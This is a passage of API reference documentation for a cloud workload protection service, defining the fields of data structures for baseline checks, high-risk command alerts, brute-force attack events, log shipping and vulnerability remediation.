LastScanTime | String | Last check time Note: This field may return null, indicating that no valid values can be obtained. |
Status | Integer | Risky item processing status. 0: failed; 1: passed. Note: This field may return null, indicating that no valid values can be obtained. |
Quuid | String | Host QUUID Note: This field may return null, indicating that no valid values can be obtained. |
HostIp | String | Host IP address Note: This field may return null, indicating that no valid values can be obtained. |
AliasName | String | Host alias Note: This field may return null, indicating that no valid values can be obtained. |
Uuid | String | Host UUID Note: This field may return null, indicating that no valid values can be obtained. |
MaxStatus | Integer | Check status Note: This field may return null, indicating that no valid values can be obtained. |
Host information of Top server risks
Used by actions: DescribeBaselineHostTop.
Name | Type | Description |
---|---|---|
EventLevel | Integer | Hazard level: 1-Low-risk; 2-Medium-risk; 3-High-risk; 4-Critical Note: This field may return null, indicating that no valid values can be obtained. |
EventCount | Integer | Number of vulnerabilities Note: This field may return null, indicating that no valid values can be obtained. |
Baseline host information
Used by actions: DescribeIgnoreHostAndItemConfig.
Name | Type | Description |
---|---|---|
HostId | String | Host ID |
HostName | String | Host name Note: This field may return null, indicating that no valid values can be obtained. |
HostTag | String | Host tag Note: This field may return null, indicating that no valid values can be obtained. |
HostIp | String | Private IP address Note: This field may return null, indicating that no valid values can be obtained. |
WanIp | String | Public IP address Note: This field may return null, indicating that no valid values can be obtained. |
MachineExtraInfo | MachineExtraInfo | Host Additional Information Note: This field may return null, indicating that no valid values can be obtained. |
Baseline Host Detection
Used by actions: DescribeBaselineHostDetectList.
Name | Type | Description |
---|---|---|
HostId | String | Host ID |
HostIp | String | Private IP address |
HostName | String | Host name |
WanIp | String | Public IP address |
DetectStatus | Integer | 0: Failed; 1: Ignored; 3: Passed; 5: Under detection |
PassedItemCount | Integer | Number of Passed Tasks in Detection |
ItemCount | Integer | Associated Detection Item Count |
NotPassedItemCount | Integer | Detection Failure Count |
FirstTime | String | First detection time |
LastTime | String | Last detection Time |
Uuid | String | CWPP UUID Note: This field may return null, indicating that no valid values can be obtained. |
MachineExtraInfo | MachineExtraInfo | Host Additional Information Note: This field may return null, indicating that no valid values can be obtained. |
Baseline affected servers list data
Used by actions: DescribeBaselineHostTop.
Name | Type | Description |
---|---|---|
EventLevelList | Array of BaselineEventLevelInfo | List of event levels and occurrences Note: This field may return null, indicating that no valid values can be obtained. |
HostName | String | Host name Note: This field may return null, indicating that no valid values can be obtained. |
Quuid | String | Host QUUID Note: This field may return null, indicating that no valid values can be obtained. |
Score | Integer | Score for calculating weight Note: This field may return null, indicating that no valid values can be obtained. |
Baseline Information
Used by actions: DescribeBaselineList.
Name | Type | Description |
---|---|---|
Name | String | Baseline name Note: This field may return null, indicating that no valid values can be obtained. |
Level | Integer | Hazard level: 1-Low-risk; 2-Medium-risk; 3-High-risk; 4-Critical Note: This field may return null, indicating that no valid values can be obtained. |
RuleCount | Integer | Number of check items Note: This field may return null, indicating that no valid values can be obtained. |
HostCount | Integer | Number of affected servers Note: This field may return null, indicating that no valid values can be obtained. |
Status | Integer | Pass status. 0: passed; 1: failed.Note: This field may return null, indicating that no valid values can be obtained. |
CategoryId | Integer | Baseline ID Note: This field may return null, indicating that no valid values can be obtained. |
LastScanTime | String | Last check time Note: This field may return null, indicating that no valid values can be obtained. |
MaxStatus | Integer | 5: checking Note: This field may return null, indicating that no valid values can be obtained. |
BaselineFailCount | Integer | Baseline check items with risks Note: This field may return null, indicating that no valid values can be obtained. |
Baseline Item
Used by actions: DescribeBaselineItemList.
Name | Type | Description |
---|---|---|
ItemId | Integer | Item ID |
ItemName | String | Item Name |
CategoryId | Integer | Detection Item Classification |
ItemDesc | String | Item Description |
FixMethod | String | Fixing Method |
RuleName | String | Rule |
DetectResultDesc | String | Check result description Note: This field may return null, indicating that no valid values can be obtained. |
Level | Integer | Risk level Note: This field may return null, indicating that no valid values can be obtained. |
DetectStatus | Integer | Detection Status. 0: Failed; 1: Ignored; 3: Passed; 5: Under detection Note: This field may return null, indicating that no valid values can be obtained. |
HostId | String | Host ID Note: This field may return null, indicating that no valid values can be obtained. |
HostName | String | Host name Note: This field may return null, indicating that no valid values can be obtained. |
HostIp | String | Host IP address Note: This field may return null, indicating that no valid values can be obtained. |
WanIp | String | Public IP address Note: This field may return null, indicating that no valid values can be obtained. |
FirstTime | String | First Occurrence Time Note: This field may return null, indicating that no valid values can be obtained. |
LastTime | String | Last Occurrence Time Note: This field may return null, indicating that no valid values can be obtained. |
CanBeFixed | Integer | Can Be Fixed or Not Note: This field may return null, indicating that no valid values can be obtained. |
Uuid | String | Host Security UUID Note: This field may return null, indicating that no valid values can be obtained. |
MachineExtraInfo | MachineExtraInfo | Host Additional Information Note: This field may return null, indicating that no valid values can be obtained. |
Baseline detection item
Used by actions: DescribeBaselineItemDetectList.
Name | Type | Description |
---|---|---|
ItemId | Integer | Item ID Note: This field may return null, indicating that no valid values can be obtained. |
ItemName | String | Item Name Note: This field may return null, indicating that no valid values can be obtained. |
ItemDesc | String | Item Description Note: This field may return null, indicating that no valid values can be obtained. |
FixMethod | String | Fixing Method Note: This field may return null, indicating that no valid values can be obtained. |
RuleName | String | Rule Note: This field may return null, indicating that no valid values can be obtained. |
DetectStatus | Integer | 0: Failed; 1: Ignored; 3: Passed; 5: Under detection Note: This field may return null, indicating that no valid values can be obtained. |
Level | Integer | Risk level Note: This field may return null, indicating that no valid values can be obtained. |
HostCount | Integer | Number of affected servers Note: This field may return null, indicating that no valid values can be obtained. |
FirstTime | String | First detection time Note: This field may return null, indicating that no valid values can be obtained. |
LastTime | String | Last Detection Time Note: This field may return null, indicating that no valid values can be obtained. |
DetectResult | String | Detection result, JSON string Note: This field may return null, indicating that no valid values can be obtained. |
RuleId | Integer | Rule ID Note: This field may return null, indicating that no valid values can be obtained. |
PassedHostCount | Integer | Number of servers passed Note: This field may return null, indicating that no valid values can be obtained. |
NotPassedHostCount | Integer | Number of servers failed Note: This field may return null, indicating that no valid values can be obtained. |
Baseline Information
Used by actions: DescribeIgnoreHostAndItemConfig.
Name | Type | Description |
---|---|---|
ItemId | Integer | Baseline Detection Item ID |
ItemName | String | Detection Item Name |
RuleId | Integer | ID of the Rule to Which the Detection Item Belongs Note: This field may return null, indicating that no valid values can be obtained. |
ItemDesc | String | Detection item description |
FixMethod | String | Remediation Method for Inspection Items |
RuleName | String | Rule Name of Detection Item |
Level | Integer | Risk level |
SysRuleId | Integer | System Rule ID Note: This field may return null, indicating that no valid values can be obtained. |
RelatedCustomRuleInfo | Array of BaselineCustomRuleIdName | Referenced Custom Rule Information Note: This field may return null, indicating that no valid values can be obtained. |
Baseline policy information
Used by actions: DescribeBaselinePolicyList, ModifyBaselinePolicy.
Name | Type | Required | Description |
---|---|---|---|
PolicyName | String | Yes | Policy name, which is no more than 128 English characters in length. |
DetectInterval | Integer | Yes | Detection interval [1: 1 day|3: 3 days|5: 5 days|7: 7 days] |
DetectTime | String | Yes | Detection time |
IsEnabled | Integer | Yes | Whether enabled [0: not enabled|1: enabled] |
AssetType | Integer | Yes | Asset type [0: all Professional and Ultimate editions|1: ID | 2: IP] |
PolicyId | Integer | No | Policy ID |
RuleCount | Integer | No | Number of associated baseline items |
ItemCount | Integer | No | Number of associated baseline items |
HostCount | Integer | No | Number of associated baseline hosts |
RuleIds | Array of Integer | No | Rule ID |
HostIds | Array of String | No | Host ID |
HostIps | Array of String | No | Host IP |
IsDefault | Integer | No | Whether the system default |
Baseline detection information
Used by actions: DescribeBaselineRule.
Name | Type | Description |
---|---|---|
RuleName | String | Detection item name |
Description | String | Detection item description |
FixMessage | String | Fixing suggestion |
Level | Integer | Severity level |
Status | Integer | Status |
RuleId | Integer | Detection Item ID |
LastScanAt | String | Last detection Time |
RuleRemark | String | Specific reason explanation |
Uuid | String | Unique UUID |
EventId | Integer | Unique event ID |
Information on TOP baseline detection item
Used by actions: DescribeBaselineTop.
Name | Type | Description |
---|---|---|
RuleName | String | Baseline detection item name Note: This field may return null, indicating that no valid values can be obtained. |
Level | Integer | Detection item hazard level Note: This field may return null, indicating that no valid values can be obtained. |
EventCount | Integer | Total number of events Note: This field may return null, indicating that no valid values can be obtained. |
RuleId | Integer | Detection Item ID Note: This field may return null, indicating that no valid values can be obtained. |
Baseline weak password
Used by actions: DescribeBaselineWeakPasswordList.
Name | Type | Required | Description |
---|---|---|---|
PasswordId | Integer | Yes | Password ID |
WeakPassword | String | Yes | Password |
CreateTime | String | No | Creation time |
ModifyTime | String | No | Modification time |
High-risk command data
Used by actions: DescribeBashEvents.
Name | Type | Description |
---|---|---|
Id | Integer | Data ID |
Uuid | String | CWPP ID |
Quuid | String | Server ID |
Hostip | String | Host private IP address |
User | String | Username for execution |
Platform | Integer | Platform type |
BashCmd | String | Executed commands |
RuleId | Integer | Rule ID |
RuleName | String | Rule name |
RuleLevel | Integer | Rule level: 1 - high-risk 2 - medium-risk; 3 - low-risk |
Status | Integer | Processing status: 0 - pending; 1 - processed; 2 - allowlisted; 3 - ignored |
CreateTime | String | Occurrence time |
MachineName | String | Server name |
DetectBy | Integer | 0: bash log; 1: real-time monitoring (thunder edition) Note: This field may return null, indicating that no valid values can be obtained. |
Pid | String | Process ID Note: This field may return null, indicating that no valid values can be obtained. |
Exe | String | Process name Note: This field may return null, indicating that no valid values can be obtained. |
ModifyTime | String | Processing time Note: This field may return null, indicating that no valid values can be obtained. |
RuleCategory | Integer | Rule category: 0 - system rule; 1 - user rule Note: This field may return null, indicating that no valid values can be obtained. |
RegexBashCmd | String | Automatically generated regular expression\nNote: This field may return null, indicating that no valid values can be obtained. |
HostName | String | Host HostName Note: This field may return null, indicating that no valid values can be obtained. |
High-risk command data (new)
Used by actions: DescribeBashEventsNew.
Name | Type | Description |
---|---|---|
Id | Integer | Data ID |
Uuid | String | CWPP ID |
Quuid | String | Host ID |
HostIp | String | Host private IP address |
User | String | Username for execution |
Platform | Integer | Platform type |
BashCmd | String | Execute commands |
RuleId | Integer | Rule ID |
RuleName | String | Rule name |
RuleLevel | Integer | Rule level: 1: high-risk 2: medium-risk; 3: low-risk |
Status | Integer | Processing status: 0: pending; 1: processed; 2: allowlisted; 3: ignored |
CreateTime | String | Occurrence time |
MachineName | String | Host name |
DetectBy | Integer | 0: bash log; 1: real-time monitoring (Leiting edition) Note: This field may return null, indicating that no valid values can be obtained. |
Pid | String | Process ID Note: This field may return null, indicating that no valid values can be obtained. |
Exe | String | Process name Note: This field may return null, indicating that no valid values can be obtained. |
ModifyTime | String | Processing time Note: This field may return null, indicating that no valid values can be obtained. |
RuleCategory | Integer | Rule category. 0: system rule; 1: user rule Note: This field may return null, indicating that no valid values can be obtained. |
RegexBashCmd | String | Automatically generated regular expression Note: This field may return null, indicating that no valid values can be obtained. |
MachineType | Integer | 0: normal; 1: Professional edition; 2: Ultimate edition Note: This field may return null, indicating that no valid values can be obtained. |
MachineExtraInfo | MachineExtraInfo | Additional Information on Machine Note: This field may return null, indicating that no valid values can be obtained. |
Details of high-risk command data
Used by actions: DescribeBashEventsInfo.
Name | Type | Description |
---|---|---|
Id | Integer | Data ID |
Uuid | String | Yunjing ID |
Quuid | String | Host ID |
HostIp | String | Host private IP address |
Platform | Integer | Platform type |
BashCmd | String | Executed commands |
RuleId | Integer | Rule ID equals 0 indicating that the rule has been deleted or the effective scope has been modified. |
RuleName | String | Rule name |
RuleLevel | Integer | Rule level: 1 - high-risk 2 - medium-risk; 3 - low-risk |
Status | Integer | Processing status. 0: Pending; 1: Processed; 2: Whitelisted; 3: Ignored |
CreateTime | String | Occurrence time |
MachineName | String | Host name |
Exe | String | Process name Note: This field may return null, indicating that no valid values can be obtained. |
ModifyTime | String | Processing time Note: This field may return null, indicating that no valid values can be obtained. |
RuleCategory | Integer | Rule category: 0 - system rule; 1 - user rule Note: This field may return null, indicating that no valid values can be obtained. |
RegexBashCmd | String | Automatically generated regular expression Note: This field may return null, indicating that no valid values can be obtained. |
PsTree | String | Process tree json pid: process ID; exe: file path; account: groups and users to which the process belongs; cmdline: command execution; ssh_service: ssh service IP, ssh_source: log-in source Note: This field may return null, indicating that no valid values can be obtained. |
SuggestScheme | String | Recommended solution Note: This field may return null, indicating that no valid values can be obtained. |
HarmDescribe | String | Description Note: This field may return null, indicating that no valid values can be obtained. |
Tags | Array of String | Tag Note: This field may return null, indicating that no valid values can be obtained. |
References | Array of String | Reference link Note: This field may return null, indicating that no valid values can be obtained. |
MachineWanIp | String | Host public IP address Note: This field may return null, indicating that no valid values can be obtained. |
MachineStatus | String | Host online status: OFFLINE ONLINE Note: This field may return null, indicating that no valid values can be obtained. |
User | String | Log-in user Note: This field may return null, indicating that no valid values can be obtained. |
Pid | String | Process ID Note: This field may return null, indicating that no valid values can be obtained. |
DetectBy | String | Data source Note: This field may return null, indicating that no valid values can be obtained. |
Details of high-risk command data (new)
Used by actions: DescribeBashEventsInfoNew.
Name | Type | Description |
---|---|---|
Id | Integer | Data ID |
Uuid | String | CWPP ID |
Quuid | String | Host ID |
HostIp | String | Host private IP address |
Platform | Integer | Platform type |
BashCmd | String | Executed commands |
RuleId | Integer | Rule ID equals 0 indicating that the rule has been deleted or the effective scope has been modified. |
RuleName | String | Rule name |
RuleLevel | Integer | Rule level: 1 - high-risk 2 - medium-risk; 3 - low-risk |
Status | Integer | Processing status: 0: Pending; 1: Processed; 2: Whitelisted; 3: Ignored |
CreateTime | String | Occurrence time |
MachineName | String | Host name |
Exe | String | Process name Note: This field may return null, indicating that no valid values can be obtained. |
ModifyTime | String | Processing time Note: This field may return null, indicating that no valid values can be obtained. |
RuleCategory | Integer | Rule category. 0 - system rule; 1 - user rule Note: This field may return null, indicating that no valid values can be obtained. |
RegexBashCmd | String | Automatically generated regular expression Note: This field may return null, indicating that no valid values can be obtained. |
PsTree | String | Process tree json pid: process ID; exe: file path; account: groups and users to which the process belongs; cmdline: command execution; ssh_service: ssh service IP, ssh_source: log-in source Note: This field may return null, indicating that no valid values can be obtained. |
SuggestScheme | String | Recommended solution Note: This field may return null, indicating that no valid values can be obtained. |
HarmDescribe | String | Description Note: This field may return null, indicating that no valid values can be obtained. |
Tags | Array of String | Tag Note: This field may return null, indicating that no valid values can be obtained. |
References | Array of String | Reference link Note: This field may return null, indicating that no valid values can be obtained. |
MachineWanIp | String | Host public IP address Note: This field may return null, indicating that no valid values can be obtained. |
MachineStatus | String | Host online status: OFFLINE; ONLINE Note: This field may return null, indicating that no valid values can be obtained. |
User | String | Log-in user Note: This field may return null, indicating that no valid values can be obtained. |
Pid | String | Process ID Note: This field may return null, indicating that no valid values can be obtained. |
MachineType | Integer | 0: normal; 1: professional version; 2: ultimate edition Note: This field may return null, indicating that no valid values can be obtained. |
DetectBy | Integer | Source of Detection: 0: bash log; 1: real-time monitoring Note: This field may return null, indicating that no valid values can be obtained. |
High-risk command policy
Used by actions: DescribeBashPolicies, ModifyBashPolicy.
Name | Type | Required | Description |
---|---|---|---|
Name | String | Yes | Policy name |
Enable | Integer | Yes | 1: valid; 0: invalid |
White | Integer | Yes | 0: blocklist; 1: allowlist |
BashAction | Integer | Yes | 0: alarm; 1: allowlist; 2: intercept |
Rule | String | Yes | Regular expression |
Level | Integer | Yes | Risk level (0: none; 1: high-risk; 2: medium-risk; 3: low-risk) |
Scope | Integer | Yes | Effective scope (0: a group of QUUID; 1: all professional editions (including ultimate edition); 2: all ultimate editions; 3: all hosts) |
Id | Integer | No | Policy ID |
Descript | String | No | Policy description Note: This field may return null, indicating that no valid values can be obtained. |
EventId | Integer | No | When it is added to the allowlist, the EventId needs to be passed in.Note: This field may return null, indicating that no valid values can be obtained. |
DealOldEvents | Integer | No | Whether to process old events as allowlisted ones: 0 - no; 1 - yes Note: This field may return null, indicating that no valid values can be obtained. |
Quuids | Array of String | No | A collection of QUUIDs for effective hosts Note: This field may return null, indicating that no valid values can be obtained. |
Category | Integer | No | Policy type: 0 - system; 1 - user |
CreateTime | String | No | Creation time |
ModifyTime | String | No | Modification time |
Uuids | Array of String | No | Compatibility with older versions may be needed. |
High-risk command rules
Used by actions: DescribeBashRules.
Name | Type | Description |
---|---|---|
Id | Integer | Rule ID |
Uuid | String | Client ID |
Name | String | Rule name |
Level | Integer | Risk level (0: none, 1: high-risk, 2: medium-risk, 3: low-risk) |
Rule | String | Regular expression |
Operator | String | Operator |
IsGlobal | Integer | Whether a global rule |
Status | Integer | Status (0: valid; 1: invalid) |
CreateTime | String | Creation time |
ModifyTime | String | Modification time |
Hostip | String | Host IP |
Uuids | Array of String | Arrays of UUIDs for servers to be effective Note: This field may return null, indicating that no valid values can be obtained. |
White | Integer | 0= blocklist; 1= allowlist Note: This field may return null, indicating that no valid values can be obtained. |
DealOldEvents | Integer | Whether to process previous events: 0: do not process; 1: process Note: This field may return null, indicating that no valid values can be obtained. |
Description | String | Rule description Note: This field may return null, indicating that no valid values can be obtained. |
Security report article details
Used by actions: DescribeSecurityBroadcastInfo.
Name | Type | Description |
---|---|---|
Title | String | Article name Note: This field may return null, indicating that no valid values can be obtained. |
GotoType | Integer | Redirection location: 0: no redirection; 1: virus scanning; 2: vulnerability scan; 3: security baseline Note: This field may return null, indicating that no valid values can be obtained. |
Subtitle | String | Subtitle |
CreateTime | String | Release time |
Content | String | Rich text content information |
Id | Integer | Article unique ID |
Type | Integer | Type: 0: emergency notification; 1: feature update; 2: industry honor; 3: version release |
Security report list
Used by actions: DescribeSecurityBroadcasts.
Name | Type | Description |
---|---|---|
Title | String | Article name Note: This field may return null, indicating that no valid values can be obtained. |
Type | Integer | Type: 0: emergency notification; 1: feature update; 2: industry honor; 3: version release Note: This field may return null, indicating that no valid values can be obtained. |
Subtitle | String | Subtitle |
CreateTime | String | Release time |
Id | Integer | Article unique ID |
Level | Integer | Severity level. 0: none; 1: critical; 2: high-risk; 3: medium-risk; 4: low-risk |
Password cracking list entity
Used by actions: DescribeBruteAttackList.
Name | Type | Description |
---|---|---|
Id | Integer | Unique ID |
Uuid | String | CWPP client UUID Note: This field may return null, indicating that no valid values can be obtained. |
MachineIp | String | Host IP address Note: This field may return null, indicating that no valid values can be obtained. |
MachineName | String | Host name Note: This field may return null, indicating that no valid values can be obtained. |
UserName | String | Username Note: This field may return null, indicating that no valid values can be obtained. |
SrcIp | String | Source IP address Note: This field may return null, indicating that no valid values can be obtained. |
Status | String | SUCCESS: cracking successful; FAILED: cracking failed Note: This field may return null, indicating that no valid values can be obtained. |
Country | Integer | Country/Region ID Note: This field may return null, indicating that no valid values can be obtained. |
City | Integer | City ID Note: This field may return null, indicating that no valid values can be obtained. |
Province | Integer | Province ID Note: This field may return null, indicating that no valid values can be obtained. |
CreateTime | String | Creation time Note: This field may return null, indicating that no valid values can be obtained. |
BanStatus | Integer | 0: no blocking (not supported for the client version)1: blocked 2: blocking failed (program exception) 3: no blocking (do not block for the private network) 4: availability zone does not support blocking 10: blocking 81: no blocking (blocking disabled) 82: no blocking (non-Pro Edition) 83: no blocking (added to the allowlist) 86: no blocking (system allowlist) 87: no blocking (client offline) Note: This field may return null, indicating that no valid values can be obtained. |
EventType | Integer | Event type. 200: brute force cracking event; 300: event of successful brute force cracking (page display); 400: event of brute force cracking on a non-existent account.Note: This field may return null, indicating that no valid values can be obtained. |
Count | Integer | Occurrence count Note: This field may return null, indicating that no valid values can be obtained. |
Quuid | String | Machine UUID Note: This field may return null, indicating that no valid values can be obtained. |
IsProVersion | Boolean | Whether it is of the Pro Edition (true/false) Note: This field may return null, indicating that no valid values can be obtained. |
Protocol | String | Username of the attacked service Note: This field may return null, indicating that no valid values can be obtained. |
Port | Integer | Port Note: This field may return null, indicating that no valid values can be obtained. |
ModifyTime | String | Last attack time Note: This field may return null, indicating that no valid values can be obtained. |
InstanceId | String | Instance ID Note: This field may return null, indicating that no valid values can be obtained. |
DataStatus | Integer | 0: pending; 1: ignored; 5: fixed; 6: added to allowlist Note: This field may return null, indicating that no valid values can be obtained. |
MachineExtraInfo | MachineExtraInfo | Additional information Note: This field may return null, indicating that no valid values can be obtained. |
Location | String | Geo-location in Chinese Note: This field may return null, indicating that no valid values can be obtained. |
RiskLevel | Integer | Threat level. 0: low-risk; 1: medium-risk; 2: high-risk.Note: This field may return null, indicating that no valid values can be obtained. |
DataFrom | Integer | Event source. 0: blocking rule; 1: threat intelligence.Note: This field may return null, indicating that no valid values can be obtained. |
AttackStatusDesc | String | Description of the brute force cracking status Note: This field may return null, indicating that no valid values can be obtained. |
BanExpiredTime | String | Blocking expiration time (valid only for events in blocking status) Note: This field may return null, indicating that no valid values can be obtained. |
Standard blocking mode rule
Used by actions: ModifyBruteAttackRules.
Name | Type | Required | Description |
---|---|---|---|
TimeRange | Integer | Yes | Timeframe of the brute force event (unit: second) |
LoginFailTimes | Integer | Yes | Number of failed attempts during the brute force event |
List of rules for determining brute force cracking
Used by actions: DescribeBruteAttackRules.
Name | Type | Description |
---|---|---|
TimeRange | Integer | Timeframe of the brute force cracking event (unit: second) |
LoginFailTimes | Integer | Number of failed attempts during the brute force cracking event |
Enable | Boolean | Whether the rule is empty. If yes, fill in the default rule. |
TimeRangeDefault | Integer | Occurrence time range of brute force cracking events, in seconds (default rule) |
LoginFailTimesDefault | Integer | Number of failed brute force cracking events (default rule) |
CKafka instance information
Used by actions: DescribeLogDeliveryKafkaOptions.
Name | Type | Description |
---|---|---|
InstanceID | String | Instance ID |
InstanceName | String | Instance name |
KafkaVersion | String | Version No. |
TopicList | Array of CKafkaTopicInfo | Topic list Note: This field may return null, indicating that no valid values can be obtained. |
RouteList | Array of CKafkaRouteInfo | Routing List |
DiskSize | Integer | Disk capacity (unit: GB) |
VpcId | String | vpcId. Leaving it blank indicates a basic network. |
SubnetId | String | Subnet ID |
Healthy | Integer | Status: 1 - healthy; 2 - alarm; 3 - abnormal instance status |
Zone | String | Availability zone |
Az | String | Region |
Bandwidth | Integer | Instance bandwidth (unit: Mbps) |
CKafka domain name information
Used by actions: DescribeLogDeliveryKafkaOptions.
Name | Type | Description |
---|---|---|
RouteID | Integer | Routing ID |
Domain | String | Domain name |
DomainPort | Integer | Domain Port |
Vip | String | Virtual IP |
VipType | Integer | Virtual IP Type |
AccessType | Integer | Access type |
CKafka topic name
Used by actions: DescribeLogDeliveryKafkaOptions.
Name | Type | Description |
---|---|---|
TopicID | String | Topic ID |
TopicName | String | Topic name |
Host information for batch vulnerability fixing
Used by actions: DescribeCanFixVulMachine.
Name | Type | Description |
---|---|---|
VulId | Integer | Vulnerability ID Note: This field may return null, indicating that no valid values can be obtained. |
VulName | String | Vulnerability name Note: This field may return null, indicating that no valid values can be obtained. |
HostList | Array of VulInfoHostInfo | Information on hosts where this vulnerability can be fixed Note: This field may return null, indicating that no valid values can be obtained. |
FixTag | Array of String | Fixing prompt tag Note: This field may return null, indicating that no valid values can be obtained. |
VulCategory | Integer |
Information on machine with non-isolatable Trojan
Used by actions: DescribeCanNotSeparateMachine.
Name | Type | Description |
---|---|---|
Quuid | String | Host QUUID |
Uuid | String | Host UUID |
Alias | String | Server name |
PrivateIp | String | Private IP address |
PublicIp | String | Public IP |
Reason | Integer | Reason for isolation failure: 1 - agent offline |
Used by actions: DescribeCloudProtectServiceOrderList.
Name | Type | Description |
---|---|---|
ResourceId | String | Resource ID |
Type | String | Type: new purchase in this case |
Config | String | Configuration: information of purchased configuration |
ServiceName | String | Service name |
BeginTime | String | Time of purchase |
Component statistics
Used by actions: DescribeComponentStatistics.
Name | Type | Description |
---|---|---|
Id | Integer | Component ID |
MachineNum | Integer | Number of hosts |
ComponentName | String | Component name |
ComponentType | String | Component type |
Description | String | Component description |
Create QUUIDs for fixing tasks
Used by actions: CreateVulFix.
Name | Type | Required | Description |
---|---|---|---|
VulId | Integer | Yes | Vulnerability ID |
Quuids | Array of String | Yes | Hosts that need to fix vulnerabilities. All hosts need to have the vulnerability with the ID of VulId and be in a pending fix status. |
FixMethod | Integer | No |
Default policy basic information
Used by actions: DescribeBaselineDefaultStrategyList.
Name | Type | Description |
---|---|---|
StrategyName | String | Policy name |
StrategyId | Integer | Policy ID |
Network attack log
Used by actions: DescribeAttackLogs.
Name | Type | Description |
---|---|---|
Id | Integer | Log ID |
Uuid | String | Client ID |
SrcIp | String | Source IP |
SrcPort | Integer | Source port |
HttpMethod | String | Attack method |
HttpCgi | String | Attack description |
HttpParam | String | Attack parameter |
VulType | String | Threat type |
CreatedAt | String | Attack time |
MachineIp | String | Target server IP |
MachineName | String | Target server name |
DstIp | String | Target IP |
DstPort | Integer | Target port |
HttpContent | String | Attack content |
MachineExtraInfo | MachineExtraInfo | Host Additional Information Note: This field may return null, indicating that no valid values can be obtained. |
Log shipping type details
Used by actions: DescribeLogKafkaDeliverInfo, ModifyLogKafkaAccess.
Name | Type | Required | Description |
---|---|---|---|
SecurityType | Integer | Yes | Security module type. 1: intrusion detection; 2: vulnerability management; 3: baseline management; 4: advanced defense; 5: client security; 6: asset fingerprint; 7: host list; 8: client reporting. |
LogType | Array of Integer | Yes | Type of logs of the security module |
TopicId | String | Yes | Topic ID |
TopicName | String | Yes | Topic name |
Switch | Integer | Yes | Shipping enabling status. 0: disabled; 1: enabled. |
Status | Integer | No | Shipping status. 0: disabled; 1: normal; 2: abnormal. |
ErrInfo | String | No | Error message |
StatusTime | Integer | No | Timestamp of last status reporting |
LogName | String | No | Logset name |
LogSetId | String | No | Logset ID |
Region | String | No | Logset region |
Batch add to allowlists
Used by actions: AddLoginWhiteLists, CreateBanWhiteList.
Name | Type | Description |
---|---|---|
Quuid | String | Quuid Note: This field may return null, indicating that no valid values can be obtained. |
Uuid | String | Uuid Note: This field may return null, indicating that no valid values can be obtained. |
Id | Integer | Id |
Expert service - emergency response information
Used by actions: DescribeEmergencyResponseList.
Name | Type | Description |
---|---|---|
TaskId | String | Task ID |
HostNum | Integer | Number of hosts |
Status | Integer | |
StartTime | String | Service start time |
EndTime | String | Service end time |
ReportPath | String | Report download link |
Emergency vulnerability information
Used by actions: DescribeEmergencyVulList.
Name | Type | Description |
---|---|---|
VulId | Integer | Vulnerability ID |
Level | Integer | Vulnerability level |
VulName | String | Vulnerability name |
PublishDate | String | Release date |
Category | Integer | Vulnerability category |
Status | Integer | Vulnerability status. 0: not detected; 1: at risk; 2: not at risk; 3: show progress during check |
LastScanTime | String | Last scan time |
Progress | Integer | Scan progress |
CveId | String | CVE ID Note: This field may return null, indicating that no valid values can be obtained. |
CvssScore | Float | CVSS score Note: This field may return null, indicating that no valid values can be obtained. |
Labels | String | Vulnerability Tags, Separated by Multiple Commas Note: This field may return null, indicating that no valid values can be obtained. |
HostCount | Integer | Number of affected machines Note: This field may return null, indicating that no valid values can be obtained. |
IsSupportDefense | Integer | Whether to support defense: 0: no; 1: yes Note: This field may return null, indicating that no valid values can be obtained. |
DefenseAttackCount | Integer | Number of Attacks Defended Note: This field may return null, indicating that no valid values can be obtained. |
Method | Integer | Detection rule: 0: version comparison; 1: POC verification Note: This field may return null, indicating that no valid values can be obtained. |
AttackLevel | Integer | Attack intensity level Note: This field may return null, indicating that no valid values can be obtained. |
DefenseState | Boolean | Whether vulnerability defense is enabled on hosts with vulnerabilities Note: This field may return null, indicating that no valid values can be obtained. |
Unprocessed security event statistics
Used by actions: DescribeSecurityEventStat.
Name | Type | Description |
---|---|---|
EventsNum | Integer | Number of events |
MachineAffectNum | Integer | Number of affected hosts |
Expert service order information
Used by actions: DescribeAvailableExpertServiceDetail, DescribeExpertServiceOrderList.
Name | Type | Description |
---|---|---|
OrderId | Integer | Order ID |
InquireType | Integer | Order type. 1: emergency; 2: Ultimate Edition important period guarantee; 3: security manager. |
InquireNum | Integer | Number of services |
BeginTime | String | Service start time |
EndTime | String | Service end time |
ServiceTime | Integer | Service duration, in months |
Status | Integer | Order status. 0: not started; 1: in service; 2: expired; 3: completed; 4: refunded and terminated. |
Task list of downloaded logs
Used by actions: DescribeLogExports.
Name | Type | Description |
---|---|---|
ExportId | String | Task ID of exported logs |
Query | String | Query statements of log export |
FileName | String | Filenames of exported logs |
FileSize | Integer | Log file size |
Order | String | Sorting of log export time |
Format | String | Log export format |
Count | Integer | Number of logs to be exported |
Status | String | Log download status. Processing: export in progress; Completed: export completed; Failed: export failed; Expired: log export expired (valid for 3 days). |
StartTime | Integer | Start time of log export, with a millisecond-level UNIX timestamp |
EndTime | Integer | End time of log export, with a millisecond-level UNIX timestamp |
CosPath | String | Log export path |
CreateTime | String | Creation time of log export |
Quick analysis of statistics data
Used by actions: DescribeFastAnalysis.
Name | Type | Description |
---|---|---|
Count | Integer | Number |
Ratio | Float | Ratio |
Value | String | Value |
Core file monitoring event
Used by actions: DescribeFileTamperEvents.
Name | Type | Description |
---|---|---|
HostName | String | Machine Name |
HostIp | String | Machine IP |
CreateTime | String | Occurrence time |
ModifyTime | String | Last occurrence time |
Id | Integer | Event ID |
Uuid | String | Host UUID |
Quuid | String | cvm id |
Type | Integer | Event Type/Action. 0 - Alarm |
ProcessExe | String | Process path |
ProcessArgv | String | Process parameter |
Target | String | Target file path |
Status | Integer | Processing Status. 0 - Pending; 1 - Allowlisted; 2 - Deleted; 3 - Ignored; 4 - Manually Processed |
EventCount | Integer | Event Occurrences |
RuleId | Integer | Rule ID |
RuleName | String | Rule name |
Pstree | String | Event Details: JSON Format |
RuleCategory | Integer | Rule Type. 0 - System Rule; 1 - Custom Rule |
MachineStatus | String | Host Online Information: ONLINE, OFFLINE |
Description | String | Severity description |
Suggestion | String | Remediation Suggestions |
PrivateIp | String | Private IP address |
ExePermission | String | Process permission |
UserName | String | Username |
UserGroup | String | User group |
ExeMd5 | String | Process name |
ExeSize | Integer | Process File Size |
ExeTime | Integer | Process Execution Duration |
TargetSize | Integer | Target file size |
TargetPermission | String | Target File Permissions |
TargetModifyTime | String | Target File Update Time Note: This field may return null, indicating that no valid values can be obtained. |
